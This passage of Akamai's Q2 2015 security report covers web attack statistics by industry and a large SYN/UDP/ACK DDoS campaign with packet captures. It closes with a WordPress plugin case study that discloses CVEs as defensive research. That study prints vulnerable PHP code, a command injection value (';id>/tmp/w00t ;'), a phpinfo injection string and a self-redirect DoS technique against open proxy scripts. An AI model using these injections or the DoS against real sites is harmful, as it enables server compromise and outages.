attacks per vertical and type, we divided the number of attacks in each vertical by the number of customers in every given vertical. By doing so, we get the average 
number of attacks per customer in each vertical. 
Since 95% of the q 2 2015 Shellshock attacks targeted a single customer, Shellshock 
is not included in the normalized view of the data. [SECTION]1 = ANALYSIS + EMERGING TRENDS
33 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Observations / In q 2 2015, the industries that were subjected to the greatest 
number of malicious requests were the retail and financial services verticals, as 
shown in Figure 1-15. That is in contrast to q 1 2015 when the retail and media and 
entertainment sectors were the most popular targets. [SECTION]1 = ANALYSIS + EMERGING TRENDS
30%
25%20%15%10%
5%
0
B2B
Goods/
ServicesB2C
Goods/
ServicesFinancial
ServicesHigh
TechnologyHotel &
TravelMedia &
EntertainmentPublic
SectorRetailNormalized View of Web Application Attacks 
by Industry, Q2 2015
  Figure 1-15: Distribution of the eight analyzed web application attack vectors 
(excluding Shellshock) across the most commonly targeted industries
In the normalized data, the most common attack vector, SQLi, takes advantage of 
improper coding of Web applications that allows attackers to inject sql statements 
into predefined back-end sql  statements such as those used by a login form. This 
may in turn allow the attacker to gain access to the data held within your database or perform other malicious actions such as those described in last quarter’s State 
of the Internet Security Report, in the Cruel (sql ) Intentions section. SQLi and 
lfi attacks were attempted against Akamai customers more than any other attack 
vector, and companies in the retail and financial services spaces were the most 
commonly attacked. 
lfi attacks consist of including local files and resources on the web server via direct 
user input (e.g. parameter or cookie). This attack is possible when a web application 
includes a local file based on the path received as part of the http request. If 
the resource include is not properly sanitized or whitelisted, it can allow certain manipulations such as directory traversal techniques. The lfi attack will attempt 
to read sensitive files on the server that were not intended to be publicly available, 
such as password or configuration information. lfi attacks were the second most common attack vector in q 2 2015, most frequently targeting retail and financial 
services sites.       
The retail sector saw the most SQLi attacks in q 2, although the company that was 
attacked more than any other company was a financial services customer. That 
specific site was particularly hard hit, with 2.5 times as many SQLi attempts as the 
next most attacked site. [SECTION]1 = ANALYSIS + EMERGING TRENDS
250,000
200,000150,000100,000
50,000
0SQLi Attacks LFI Attacks
B2B
Goods/
ServicesB2C
Goods/
ServicesFinancial
ServicesHigh
TechnologyHotel &
TravelMedia &
EntertainmentPublic
SectorRetail
  Figure 1-16: Retail and financial services were the most popular targets of SQLi and LFI 
attacks in Q2 2015 Normalized SQLi and LFI Attacks by Industry, Q2 2015
34 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
35 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
xss was the third most common attack vector, with more than 10.78 million attacks, 
primarily targeting the retail and financial services sectors. 
rfi was the fourth most commonly employed attack vector in q 2 2015  
(2.83 million attacks), with financial services and hotel and travel as the industries 
most targeted in q 2 2015. 
Close behind rfi , mfu attacks were the fifth most commonly used attack vector 
(2.45 million attacks). mfu attempts overwhelmingly targeted the hotel and travel industry.
The PHPi attack vector was sixth (1.93 million attacks), with the most common 
targets in retail and the public sector. 
In q2 2015, CMDi attacks (1.07 million) most frequently targeted the financial 
services, retail and hotel and travel industries, while JAV Ai attacks (39,100) were 
mostly directed at the financial services sector.
1.2
F / Future Web Application Attacks Analysis / As csi  and the capabilities of our 
Threat Research team grow, we look forward to continuing to report on data such 
as that included here, as well as new trends as they develop. Please engage us and let 
us know which types of data you’ d like to see in the next report. As long as we can guarantee the anonymity of our customers, we’ll continue to share as much as we 
can in the most useful way possible.   
1.3 / Data Sources / The Akamai platform consists of more than 200,000 servers 
in more than 100 countries around the globe and regularly transmits between 
15 – 30% of all Internet traffic. In February 2014, Akamai added the Prolexic network 
to its portfolio, a resource specifically designed to fight DDoS attacks. This report 
draws its data from the two platforms in order to provide information about current 
attacks and traffic patterns around the globe. [SECTION]1 = ANALYSIS + EMERGING TRENDS
36 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The Akamai platform provides protection by being massively distributed, protected 
by the use of the Kona waf  and the ability to absorb attack traffic closest to where 
it originates. In contrast, the Prolexic DDoS solution protects by routing traffic to scrubbing centers where experienced incident responders use a variety of tools to remove malicious traffic before passing it to the origin servers. The two types 
of technology are complementary and provide two lenses through which we can 
examine traffic on the Internet.  [SECTION]1 = ANALYSIS + EMERGING TRENDS
[SECTION ]2
MULTI-VECTOR
DDoS ATTACKS
About half of all DDoS attack campaigns mitigated by Akamai use two or 
more attack vectors. One specific combination of vectors has appeared 
repeatedly in attacks greater than 100 Gbps: the use of syn  and udp  vectors 
with extra data padding. An extremely large attack of syn  and udp  vectors was used 
again in Q2 2015 — this time with the addition of an ack  flood.
37 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
38 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The q2 attack described here reached a peak bandwidth of 245 Gbps and a peak 
packet per second rate of 46 Mpps. The padding of the udp  data appeared to be 
the same as in earlier attacks. The syn  flood appeared to contain data referring to a 
particular torrent file.  
Large attacks of this sort take on a unique characteristic that sets them apart. 
Typically, attacks from the DDoS-for-hire market depend on reflection-based 
techniques. However, this attack appears to be a bot-based attack similar to Spike  
and IptabLes/IptabLex, which have produced similar padded payloads. 
2.1 / Attack Signatures / During the DDoS attack campaign, the following 
observations were made about the signatures shown in Figure 2-1:
  • Each attack vector targets destination port 80, while source ports are random
  • udp payloads are all at least 1,000 bytes in length
   •  The majority of the syn  flood traffic contained 896-byte payloads, as shown 
in the syn  payload size chart in Figure 2-2. The syn  flood was combined with 
other tcp  flags.
  • The ack flood was composed of 0-byte payloads and had a fixed ack  number
  • Both syn and ack  set a window size of 65535
tcp port 80 is the default http port for web servers, but malicious actors don’t 
exclusively target port 80 over tcp . When attacking a web site, the actor will typically 
set each vector to target port 80. The udp  traffic may not even reach the target ip . 
Nonetheless, the 1,000+ byte udp packets do pack a punch. The overhead reduction 
enabled by udp , as compared to tcp , allows for faster throughput from the attack 
source. The burden placed on the target infrastructure is still a factor. [SECTION]2 = DD OS ATTACK SPOTLIGHT
39 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
  Figure 2-1: DDoS attack signatures used during this attack campaign. The SYN flood 
contains a torrent referenceUDP Flood
13:27:07.819278 IP 192.118.76.164.40573 > Y.Y.Y.Y.80: UDP, length 1000
....E.....@.7.V..vL.zb..}.P..]AEz....@....+.vL.zb.....|.........................................................................................................................................................................
............................................................................<snip>....
ACK Flood
14:07:31.645185 IP 105.63.70.211.56103 > Y.Y.Y.Y.80: Flags [.], ack 16777216, win 65535, 
length 014:08:25.968210 IP 214.14.45.252.38788 > Y.Y.Y.Y.80: Flags [.], ack 16777216, win 65535, length 0
SYN Flood
13:35:29.463579 IP 84.236.124.125.58234 > Y.Y.Y.Y.80: Flags [S], seq 3816467470:3816468366, win 65535, length 896....E....z..{..sT.|}..5..z.P.z......P.....................5.k.........0.p.l.........
1.To
m...”.....2.00.2.iso.75 Tourer - MG ZR ZT ZTT ZS MG TF - All Manuals.iso.......................................<snip>......
13:27:36.920623 IP 211.142.30.46.38176 > Y.Y.Y.Y.80: Flags [SW], seq 
2501915743:2501916639, win 65535, length 89613:27:36.920626 IP 112.5.230.168.43734 > Y.Y.Y.Y.80: Flags [SEW], seq 
2866162251:2866163147, win 65535, length 896
13:27:36.920798 IP 211.142.30.46.41162 > Y.Y.Y.Y.80: Flags [SE], seq 2697634830:2697635726, win 65535, length 896
The syn  flood also contains large data payloads — mostly 896 bytes per packet.
The method used for padding data appeared to have picked up some artifacts from 
the attack source, possibly loaded from memory. The expanded syn payload shown 
in Figure 2-1 contains references to a file likely obtained via torrent. Although the 
actual data within the payloads didn’t affect the attack behavior, it added unique 
attributes that can aid mitigation and investigation. [SECTION]2 = DD OS ATTACK SPOTLIGHT
40 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
2.2 / ACK and SYN Behavior in a Distributed Attack / ack floods are 
intended to tie up server resources. Since the ack  flood requests do not correspond 
to active tcp sessions, the server responds with a reset to the source of the request. 
This type of request is less likely to make it past a firewall that keeps track of session 
state. syn flood requests can make it through stateful firewalls, because syn  requests 
are used to form tcp  sessions. Servers will respond with a syn-ack, which can also 
tie up server resources. 
That being said, these requests are part of a distributed denial of service attack, 
which is the key when talking about syn floods and other attacks in the context 
of DDoS. It simply doesn’t matter what is or isn’t supposed to happen with these 
requests when they are sent at a rate of 46 million per second. 74.8% 20.9%896
bytes6
bytes0
bytes20
bytes970
bytes
2.8%
0.8%0.7%Top SYN Payload Size
  Figure 2-2: Most SYN payloads contained exactly 896 bytes, not including IP or  
TCP headers [SECTION]2 = DD OS ATTACK SPOTLIGHT
41 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
In addition to the high packet rate, the extra payload data on syn  requests observed 
during the attack doesn’t change the way they are treated by end devices. The 
payloads are added to create higher bandwidth and attacks this large will exceed 
the throughput limits of network devices. Even if the requests don’t make it to the end server, the bandwidth at the target network may not be adequate to withstand 
an attack this large while continuing to serve typical traffic. Usually, support from a 
dedicated DDoS mitigation provider is required to block the DDoS attack in the cloud.
2.3 / Source Countries / Attack traffic was sourced mostly by the United States 
and also came from China, Japan, South Korea and the uk as show in Figure 2-3.
2.4 / Not DDoS-for-Hire / Attacks sourced from the DDoS-for-hire market 
are popular, as demonstrated by the high percentage of reflection-based attacks 
observed each quarter. This attack does not appear to have been sourced from the 
DDoS-for-hire market. Instead, it appears to originate from a more traditional method:   [SECTION]2 = DD OS ATTACK SPOTLIGHT
64.2%
16.3%7.5%6.4%5.6%US China Japan Republic
of KoreaUKTop Source Countries for 950-Byte SYN Payload
  Figure 2-3: Top five source countries for the SYN payload
42 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
bot-based attacks. Tools such as Spike and IptabLes/IptabLex have produced similar 
padded payloads. However, differences in the signatures may indicate a different 
threat or modifications to one of those tools.
2.5 / Summary / Multi-vector syn  and udp  attacks continue to produce some of 
the largest bandwidth DDoS attacks. Regardless of how syn  and ack  are handled 
by a server or a firewall, these distributed attacks are likely to overwhelm the 
target network. 
udp attacks in particular, require less overhead to launch and can produce high 
bandwidth or high packet rates; one udp  attack this quarter peaked at more than 
200 Mpps. Y et the udp  payloads in this attack contained 1-byte payloads. 
Bot-based attacks pose difficulties for attackers, as it is difficult to maintain an army 
of infected hosts. Administrators will eventually notice their server is consuming 
an inordinate amount of outbound bandwidth. Once discovered, the administrator can rebuild the server or eliminate the threat. The infection methods used by DDoS 
malware also allow administrators to take proactive measures to ensure their servers 
aren’t affected. Once the word gets out about a malware threat spreading — and how 
it spreads, new mitigation tactics can be applied. After that, there won’t be much 
room left for the malware to spread and infect new hosts. 
DDoS-for-hire tools are often more difficult to combat since many are based on 
methods of reflection. ssdp  and dns  reflection attacks will likely be around for some 
time, while new vectors like RIPv1 lend flexibility to the attacker’s arsenal. [SECTION]2 = DD OS ATTACK SPOTLIGHT
[SECTION ]3
CASE STUDY:
WORDPRESS
AND THE
DANGER OF
THIRD-PARTY
PLUGINS
WordPress is the world’s most popular website and blogging platform. 
Its ever-growing popularity makes it an attractive target for attackers 
who aim to exploit hundreds of known vulnerabilities to build botnets, 
spread malware and launch DDoS campaigns.
WordPress itself isn’t poorly written or shortsighted. The general security practices 
and features of the core are well-intentioned and well-implemented, and generally 
benefit from a lot of scrutiny by the core WordPress team, as well as hundreds of open source software contributors. 
43 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
44 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
However, many of its security issues come from third-party plugins and themes. 
These third-party components are written by developers with various skill levels and 
experience. They offer features as simple as customizing text input boxes to complex 
shopping cart and payment processing frameworks. These plugins can be downloaded from third-party directories, developers’ websites, and from WordPress.org  
official listings. These plugins go through very little, if any, code vetting. 
Getting a plugin or theme listed on WordPress.org is a fairly strict process, as it 
requires review and approval on initial submission and must adhere to WordPress’ 
long list of guidelines . 
After this initial submission, review and approval, however, future changes go 
through a less-stringent vetting process. This means your secure plugin of today 
could be your attacker’s plugin of choice when the plugin is updated in six months.
Given this thriving ecosystem, we reviewed some of the most popular plugins and 
themes on WordPress.org to determine the general security posture of third-party 
plugins and what vulnerabilities we could discover.
3.1 / General Findings / We used WordPress.org’s listing and sorting features 
and downloaded the most popular plugins and themes for a number of pages. This 
led to a total of 600 plugins and 722 themes, with popularity ranging from a few 
thousand to a few hundred thousand active installs, according to WordPress.org’s download statistics.  
We utilized a slightly modified version of the php  static analysis tool rips, along 
with manual code review and dynamic testing on a standard WordPress installation 
to weed out and confirm exploitation potential. After testing 1,322 collective plugins 
and themes, we identified 25 individual plugins and themes that had at least one 
vulnerability — and in some cases, multiple vulnerabilities — totaling 49 potential 
exploits. These are listed in Section 3.6 of this report. [SECTION]3 = CASE STUDY
45 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The most common vulnerabilities were cross-site scripting (xss), which was expected. 
Conversely, there were some surprising discoveries, such as few local file inclusion 
(lfi) and path transversal (pt ) exploits among the plugins and themes analyzed. 
lfi and pt  were at the top of our watch list due to their ability to leak very sensitive 
information and the lack of standards when coping with them (whitelisting, blacklisting, regular expressions, extension enforcement, etc.). However, most 
developers appear to be aware of the potential for abuse and have taken steps to successfully prevent lfi and pt  exploits. There were a few dangerous lfi  
vulnerabilities, including one that would require the end user to modify a constant in the source code.
The most surprising discoveries were the number of email header injection 
vulnerabilities found in the themes, along with two instances of a site-wide DoS 
technique that could be leveraged against some open proxy scripts.
Many of the third party developers followed general guidelines and best practices 
by including files to prevent directory listings, checking script access to prevent 
direct execution, and using 
is_admin() , as well as other measures to ensure users 
couldn’t (easily) abuse things they shouldn’t access. 
In general, most developers used the tools provided by php  and WordPress and 
appeared to stick to best practices when it came to limiting direct access to scripts, 
enforcing user privileges, preventing directory listings, and using prepared sql  
statements. This is likely in part due to WordPress’ own review process. In our lab environment, this was quite successful in preventing would-be attackers from succeeding with our potentially vulnerable  discoveries. However, there were cases 
where developers used either the wrong tool or an improper implementation that would allow attackers to successfully exploit a flaw that appeared at first glance to be secure. Instances of this included a cross-site request forgery (csrf ) and a 
subsequent xss attack into an admin’s session due to improper usage. [SECTION]3 = CASE STUDY
46 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.comIn the next section, we’ll review some of our discoveries, including cases of xss, 
csrf , and a DoS technique capable of crippling the underlying php  parser and 
taking down an entire site with a single request.
3.2 / Cross-Site Scripting / Unsurprisingly, xss was the most common 
vulnerability we observed. xss is a common oversight in web applications and 
plugins. While most developers did a good job of utilizing the WordPress functions 
(esc_html, esc_attr, esc_textarea, esc_js,  etc.) to sanitize output, some 
used them incorrectly or not at all. Some of the instances of xss were common, 
usually failing to properly sanitize search text or contact form input. 
Others relied on using http referrer headers. Abusing http referrer headers in 
this manner only requires an attacker to redirect the user from a crafted url  into 
the injectable page. There were several instances that seem as though developers didn’t consider the contents of http headers and thus 
$_SERVER  would be subject 
to adversarial control, as shown in Figure 3-1.
  Figure 3-1: An example showing abuse of an HTTP referrer header via XSS, in the 
lab environment [SECTION]3 = CASE STUDY
47 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Another case involved a marketing plugin. While the developers had taken steps 
to prevent abuse by using wpnonce  for csrf  prevention, they had implemented the 
verification process incorrectly. In the lab environment, this allowed us to modify 
settings of the plugin from a third-party site. The developers did not sanitize output 
of their settings page, which made a stored xss attack feasible. In our lab, we were able to craft a page that would infect the settings page with a xss payload over csrf , 
and then redirect the admin to the now-poisoned page and execute the code, as shown in Figure 3-2. This allowed researchers to side-jack the administrator’s active session and gain access to the admin section of the WordPress installation. What’s 
more, because the payload and the rendering are sent in two different requests, 
this attack works in modern browsers such as Chrome, which under normal circumstances implement very effective anti-xss measures by default.
3.3 / Email Header Injection / Themes are little more than a skin and graphics 
for a WordPress installation. Our initial assumption was that primarily we would discover xss holes without many avenues for backend abuse. However, we identified 
multiple themes that were vulnerable to email header injection. This was mostly due to themes including a contact page equipped with a form and form handling logic, with little or no input sanitization, as shown in Figure 3-3. [SECTION]3 = CASE STUDY
  Figure 3-2: An example of CSRF exploitation
48 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
3.4 / Open Proxy Scripts / Many lfi vulnerabilities were successfully mitigated 
in the plugins due to processes implemented by the developers. These processes 
would scrub or test the input before it made it into functions such as file_get_
contents()  and readfile() . One concern was the failure to limit the scope of 
these file inclusion calls. 
The developers’ processes often ensured proper extensions were part of the request, 
and path transversal attempts were either blocked outright or effectively killed by input sanitization. However, most of them did not check or enforce protocols or domains, leaving malicious actors the opportunity to use php  wrappers or to 
abuse the scripts as open-proxies. While open-proxies may not seem exceedingly dangerous, we’ve seen the rise in popularity of tools such as davoset  & UFOnet 
using open-proxy scripts for DDoS campaigns. Similarly, we have seen the Joomla 
Attack tool on multiple DDoS-for-hire sites, following the discovery of an open-
proxy script in a popular Google Maps plugin for Joomla.  Figure 3-3: An example WordPress theme contact form vulnerable to email 
header injection<?php get_header(); ?>
<?php
/*-----------------------------------------------------------
  Form
-----------------------------------------------------------*/
$nameError = ’’;
&emailError = ’’;
$commentEroor  = ’’;//If the form is submittedif(isset($_POST[‘submitted’])) { $name = trim($_POST[’contactName’]);
 $email = trim($_POST[’email’]);
 $phone = trim($_POST[’phone’]);
 $comments = trim($_POST[’comments’]);
 if(!isset($hasError)) {
  $emailTo = esc_html(ot_get_option(’charitas_contact_form_email’));
  if (!isset($emailTo) || ($emailTo == ’’) ){
   $emailTo = esc_html(get_option(’admin_email’));  }  $subject = ’New message From’.$name;
  $body = “My name is: $name \n\nMy Email is: $email \n\nMy phone number is: $phone \n\nMy comments: $comments”;
  $headers = ’From: ’.$name.’ <’.$email.’>’ . “\r\n” . ‘Reply-To: ’ . $email;
  mail($emailTo, $subject, $body, $headers);
  $emailSent = true;
 }}//end form [SECTION]3 = CASE STUDY
49 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
In our testing, we identified two instances of plugins shipping with proxying scripts 
of this type. We discovered that calls to file_get_contents()  and readfile()  
in php respect http 300 codes and will attempt to follow redirects in search of the 
requested content. With this discovery, researchers in the lab environment were able to take a site down for multiple minutes with a single request by using a small shell script that would issue one request every .5 seconds. The site was taken down 
quickly, but more importantly, it remained down for more than an hour after we 
had stopped actively sending the malicious requests.
This style of DoS doesn’t overwhelm the network or web server (in our case nginx) 
with massive amounts of traffic. In fact, in our initial lab testing, the loads on the 
server were so low we initially thought the attack wasn’t working. Rather, the attack overwhelms the php  parser by fetching a script we control, which causes it to fetch 
itself, recursively, until exhaustion. This is possible because it follows http redirects within the affected functions. 
One of the open proxy scripts ships with the wp Mobile Edition (wpme) plugin, 
which has more than 7,000 actives installations, according to WordPress.org 
statistics. There is also an open proxy script that ships with the Gmedia Gallery plugin, with more than 10,000 active installations, per WordPress.org. These two 
plugins represent more than 17,000 potential targets, assuming WordPress.org’s 
stats are accurate and up to date. Approximately 1,200 of these targets could be identified with Google dorking.
The script we targeted is used within the wpme plugin for loading, compressing, 
and caching css files. The script is technically part of a third party theme called mTheme-Unus that appears to be a universal mobile theme. Upon our discovery 
and subsequent research into it, we found it has had some issues in its past. [SECTION]3 = CASE STUDY
50 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The script we tested resides deep within the wp-content  directory structure. In 
the lab, we targeted the script directly and told it to fetch what appears to be a css 
file from a server we control. The request must appear to fetch a css file due to 
extension checking within the script as part of its own lfi prevention. This request to our server was caught by a single line php  file that redirected the request back to 
the proxy script, telling it to fetch itself, fetching us. This acts like a fork bomb or infinite loop, with each request into the proxy fetching a redirect into the proxy that fetches a redirect into the proxy yet again, until the php  parser kills the thread due 
to memory or execution time limits, as shown in Figures 3-4 through 3-8.
  Figure 3-4: In the lab, an attack shell script successfully redirected the CSS file request 
to a server under researcher’s control
  Figure 3-5: The CSS file then redirected the request back to the proxy script
  Figure 3-6: The nginx error logs show the failed responses to the proxy script [SECTION]3 = CASE STUDY
The access and error logs illustrate what is happening with more detail: php-fpm  
has exhausted its allotted resources for child processes. Even with nginx and  
php-fpm tuning measures in place — such as increasing  max_children  to more 
than 9,000 and limiting max_requests  to 500 — php-fpm stopped responding 
after a few minutes of two requests per second, effectively taking the site offline, as 
shown in Figure 3-9.  Figure 3-7: The PHP-FPM logs display multiple warning errors as the script continues its 
requests back to the host and exhausts its resources[29-May-2015 22:40:39]WARNING:[pool www]seems busy(you may need to increase pm.start_servers,  
or pm.min/max_spare_servers),spawning 32 children, there are 0 idle, and 602 total children
[29-May-2015 22:40:40]WARNING:[pool www]seems busy(you may need to increase pm.start_servers,  
or pm.min/max_spare_servers),spawning 32 children, there are 0 idle, and 603 total children[29-May-2015 22:40:41]WARNING:[pool www]seems busy(you may need to increase pm.start_servers,  
or pm.min/max_spare_servers),spawning 32 children, there are 0 idle, and 604 total children[29-May-2015 22:40:42]WARNING:[pool www]seems busy(you may need to increase pm.start_servers,  
or pm.min/max_spare_servers),spawning 32 children, there are 0 idle, and 605 total children[29-May-2015 22:40:43]WARNING:[pool www]seems busy(you may need to increase pm.start_servers,  
or pm.min/max_spare_servers),spawning 32 children, there are 0 idle, and 606 total children[29-May-2015 22:40:44]WARNING:[pool www]seems busy(you may need to increase pm.start_servers,  
or pm.min/max_spare_servers),spawning 32 children, there are 0 idle, and 607 total children
  Figure 3-8: The nginx access logs show the server’s repeated calls back to itself
   Figure 3-9: The error message displayed when nginx failed to communicate with the 
exhausted PHP-FPMAn error occurred . 
Sorry, the page you are looking for is currently unavailable.  
Please try again later.
If you are the system administrator of this resource then you should check the  
error log  for details.
Faithfully yours, nginx.
51 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com [SECTION]3 = CASE STUDY
52 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
3.5 / Command Injection / Among the WordPress plugins we tested, XCloner 
stood out due to its underlying system level functionality and its history of security 
issues. XCloner is a backup and restore component designed for php /MySQL 
websites and can work as a native plugin for WordPress and Joomla.
This plugin has multiple known and published vulnerabilities; we discovered even 
more. The combination of vulnerabilities we identified in our research could allow 
an attacker to use a web shell to gain remote access to critical functions, using just a little Google dorking. With more than 1 million downloads, this has potential to 
be a severe vulnerability. 
The first vulnerability involves command injection. The contents of 
$excluded_cmd  
(line 1129) are passed to the exec()  function on line 1205 of cloner.functions.php , 
as shown in Figure 3-10.
Using the backup comments feature, we can create a file with a list of executable 
commands, under administrator/backups/.comments . This file could include 
whatever the attacker wants, such as ;id>/tmp/w00t ;. The attacker can then change 
the configuration to a manual backup and perform a backup to gain control of the 
site, as shown in Figure 3-11.  Figure 3-10: Command injection vulnerabilities in the cloner.functions.php  script1129 $excluded_cmd = “”;
1130 if ($fp = @fopen($_REQUEST[‘excl_manual’], “r”)) {1131 while (!feof($fp))1132 $excluded_cmd .= fread($fp, 1024);1133
1134 fclose($fp);
1135 }
Line 1205: If configured for manual mode the contents of $excluded_cmd are passed to 
exec();
1205 exec($_CONFIG[tarpath] . “ $excluded_cmd “
. $_CONFIG[‘tarcompress’] .“vf $backup_file update $file”); [SECTION]3 = CASE STUDY
53 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.comThe $excluded_cmd  can be used for xss, as shown in Figure 3-12. 
  Figure 3-13: XCloner vulnerabilities include the ability to edit language files (Italian in 
this case) to inject a PHP scriptAn attacker could also modify the language files to inject arbitrary php  scripts as 
shown in Figure 3-13 and Figure 3-14. [SECTION]3 = CASE STUDY
  Figure 3-11: An example command injection using the backup comments feature
  Figure 3-12: Example abuse of the $excluded_cmd  for XSS in XCloner
54 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The default template has an error with the LM_LOGIN_TEXT  field, which the 
researcher needs to clean to prevent a syntax error when trying to execute. 
  Figure 3-14: The LM_LOGIN_TEXT  field had to be cleared, as shown on the right
  Figure 3-15: The resulting lines 1-3 of the injected code in italian.php1 <?php
2 define(“LM_FRONT_CHOOSE_PACKAGE”,”foo”);phpinfo();define(“foo”,”fo”);3 define(“LM_FRONT_CHOOSE_PACKAGE_SUB”,”<small>Si prega di selezionare la vers    ione di Wordpress che si desidera installare</small>”);Adding foo”);phpinfo();define(“foo  to the Translation LM_FRONT_*  
field and then browsing to language/italian.php  executes the malicious 
phpinfo();  script.
This command injection vulnerability, combined with cve-2014-8605, could easily 
result in a compromised website. An adversary could download your WordPress 
database via a predictable storage path in the web root. The database will contain the WordPress password hashes for all accounts, including the administrator account.  
Once this hash has been cracked, the attacker can then use the remote command 
injection vulnerability to run shell commands and compromise the entire server.
3.6 / Cleanup / During this research, we encountered several good developers 
who were quick to address the issues and push patches. The challenge is tracking 
down what code belongs to what developer. On WordPress.org, finding contact information for authors of plugins and themes can be a challenge. There should be 
a standardized way to contact them from the WordPress.org site privately. While 
there is a support forum, it’s public. Ideally, there would be a way to share private posts directed just to the author. [SECTION]3 = CASE STUDY
Figure 3-16 includes a list of the plugins we reviewed, the vulnerabilities found in 
each, and the cve designations associated with them.
A number of authors were very proactive in getting these issues addressed and 
updates pushed live. Others were not responsive.  Plugin/Theme Name Vulnerabilities Found CFE Associated
XCloner XSS, Cmd InjCVE-2015-4336
CVE-2015-4337CVE-2015-4338
AdSense Click-Fraud Monitoring XSS CVE-2015-3998
Wow Moodboard Lite Open Redirect CVE-2015-4070
Gmedia Gallery XSS, LFI, Open Proxy, DoSCVE-2015-4339CVE-2015-4340
WP Mobile Edition XSS, LFI, Open Proxy, DoS, Email Inj.CVE-2015-4560
CVE-2015-4561
CVE-2015-4562
Lightbox Bank XSS CVE-2015-4563
WP Fastest Cache XSS CVE-2015-4564
Leaflet Maps Marker XSS CVE-2015-4565
WordPress Landing Pages XSS CVE-2015-4566
AVH Extended Categories Widgets SQLi CVE-2015-4567
Huge-IT Gallery XSS CVE-2015-4568
Huge-IT Video Gallery XSS CVE-2015-4568
Easy Google Fonts XSS CVE-2015-4569
WordPress Calls to Action CSRF, XSS CVE-2015-4570
Constant Contact for WordPress XSS CVE-2015-4571
Zerif Lite Theme XSS CVE-2015-4572
Colorway Theme XSS, Email Inj.CVE-2015-4573CVE-2015-4574
Charitas Lite Theme Email Inj. CVE-2015-4575
Ariwoo Theme XSS, Email Inj.CVE-2015-4576CVE-2015-4577
Kage Green Theme XSS CVE-2015-4578
Intuition Theme XSS CVE-2015-4579
iMag Mag Theme XSS CVE-2015-4580
FastNews Lite Theme XSS pending
Business Directory Theme XSS CVE-2015-4581
Boot Store Theme XSS CVE-2015-4582
SE HTML Album Audio Player LFI CVE-2015-4414
Aviary Image Editor Add-on for Gravity Forms Pre Auth File Upload CVE-2015-4455
Easy2Map & Easy2Map-Photos SQLiCVE-2015-4614
CVE-2015-4615
CVE-2015-4616 CVE-2015-4617
Zip Attachments LFI CVE-2015-4694
WP-Instance-Rename LFI CVE-2015-4703
Figure 3-16: WordPress plugin and theme vulnerabilities reviewed for this report [SECTION]3 = CASE STUDY
56 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Overall, we were encouraged by the speed and general appreciation shown by the 
developers we were able to successfully contact. In cloud security research, it can be a 
frustrating experience exposing vulnerabilities to a software provider. With smaller 
developers, however, many were very happy to be informed of vulnerabilities and serious about fixing them. In some cases, they updated versions and pushed fixes 
live within hours of the initial disclosure.
One concern was how frustrating it was when it came time to disclose our findings 
to the respective authors. WordPress.org acts as a central hub for these plugins, 
themes, users, and authors, but seems to lack a proper standard for contacting 
them. There is no requirement to list contact information or even a website on the plugin developer profiles. For themes, tracking this information down can be 
even more frustrating, depending on what the author has included as their Theme 
Homepage link. In most cases, contacting an author involved a series of clicks and/or some detective work, usually resulting in landing on a contact form of a website 
we hoped belonged to the right person. One of the affected plugins we identified 
is still orphaned; the company named within the documentation continues to say, “It’s not ours. ” 
WordPress.org does offer a public support forum for every plugin and theme hosted 
there. This is nice for letting users and authors interact and address general issues, but due to the sensitive nature of some security issues, this option is not ideal. In 
some cases, where we weren’t able to find contact information, a simple request for 
the author to contact us via email was made, and eventually some of those authors did reach out to us in private.
Going forward, we hope to see WordPress.org standardize and vet contact 
information for plugin and theme authors. At the very least, they should offer an option to create a private thread within the respective support forums to allow only 
the author and initial poster to read and respond. [SECTION]3 = CASE STUDY
57 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
3.7 / Mitigation and Best Practices /In general, best practices should be 
applied when deploying any third party software on your servers and sites. Each 
new moving piece has the potential to become an attacker’s next weapon. Think of 
your security as a chain; it’s only as strong as its weakest link.
Do some research into the plugins you consider before installing them, look at the 
author’s history, and see if they have a history of CVEs or other security concerns 
in their past. If you can comprehend code, run the software through a free static analysis tool such as rips or a commercial solution to identify potentially vulnerable 
pieces of code and functionality.
If you’re currently running any of the plugins or themes mentioned here, you should 
update them when the authors have published patches, addressing the issues in the 
plugin’s change logs. If they haven’t addressed the issues, you can manually patch 
the code yourself to properly sanitize inputs and/or outputs in the WordPress plugin editor interface, find an alternative plugin, or uninstall the affected plugin if it isn’t 
necessary for operations.
Of all the vulnerabilities we discovered, the majority of them could be mitigated 
using the default Kona Rule Set (krs 1.0) provided by Akamai’s web application 
firewall (waf ). Akamai’s Kona Site Defender protects against the owasp  top 10 web 
vulnerabilities and may be used to mitigate the newly disclosed vulnerabilities (see 
Figure 3-16) using our ruleset.
Kona Site Defender, by default, provides generic attack detection for:
  • xss, SQLi, lfi, rfi , CMDi and pt
  •  Custom rules can also be implemented for other platform/application 
specific attacks
In some cases, default rules exist, but custom rules could be developed to mitigate 
risk before a patch has become available from the vendor. [SECTION]3 = CASE STUDY
58 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
To harden your WordPress installs, there are a handful of software and configuration 
